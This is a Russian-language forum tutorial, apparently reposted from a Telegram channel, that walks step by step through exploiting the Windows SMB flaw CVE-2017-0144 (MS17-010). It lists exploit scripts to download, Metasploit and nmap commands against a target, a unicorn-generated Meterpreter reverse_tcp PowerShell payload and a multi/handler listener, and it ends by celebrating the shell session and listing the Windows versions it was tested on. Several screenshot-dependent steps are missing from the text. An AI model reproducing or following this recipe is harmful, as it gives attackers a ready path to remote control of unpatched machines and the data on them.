CVE-2017-0144 |MS17-010
https://t.me/Torchik_RuВсем привет, сегодня я вам покажу как эксплуатировать CVE-2017-0144 начнем.
Качаем это:
https://www.exploit-db.com/exploits/42315/
и это :
https://github.com/worawit/MS17-010/blob/master/mysmb.py
и вот это:
https://github.com/trustedsec/unicorn
Кидаем все в одну папку и создаем файл:Код:
touch _init_.py
Следующим шагом заходим в metasploit.
Пишем:
use auxiliary/scanner/smb/pipe_auditor
set rhosts <ваша цель>
run
Должно появиться это:
Теперь пишем:
nmap -A -p 445 <ваша цель>
Нас интересует это:
Далее пишем:
gedit <название файла скачанного отсюда https://www.exploit-db.com/exploits/42315/>
Там, где USERNAME, пишем что получили в nmap(guest)
Ищем этот фрагмент кода
Убираем комментарий с этой строчки:
Приводим строчку в такой вид:
Теперь создадим нагрузку:
python unicorn.py windows/meterpreter/reverse_tcp <ваш ip> <порт>
Открываем файл powershell_attack.txt копируем содержимое и вставляем сюда:
Удалим кавычку в конце:
Сохраняем файл.
Выставляем прослушку в metasploit :
use exploit multi/handler
set lport <port>
set lhost <ваш ip>
set payload windows/meterpreter/reverse_tcp
exploit
Эксплуатируем:
python <название файла скачанного отсюда https://www.exploit-db.com/exploits/42315/> <ip цели> <pipe>(например netlogon)
Выполняем команду до тех пор пока не появиться это:
Нам прилетает сессия)
Протестировано на:
- Windows 2016 x64
- Windows 10 Pro Build 10240 x64
- Windows 2012 R2 x64
- Windows 8.1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64
- Windows 2008 SP1 x64
- Windows 2003 R2 SP2 x64
- Windows XP SP2 x64
- Windows 8.1 x86
- Windows 7 SP1 x86
- Windows 2008 SP1 x86
- Windows 2003 SP2 x86
- Windows XP SP3 x86
- Windows 2000 SP4 x86
[Источник]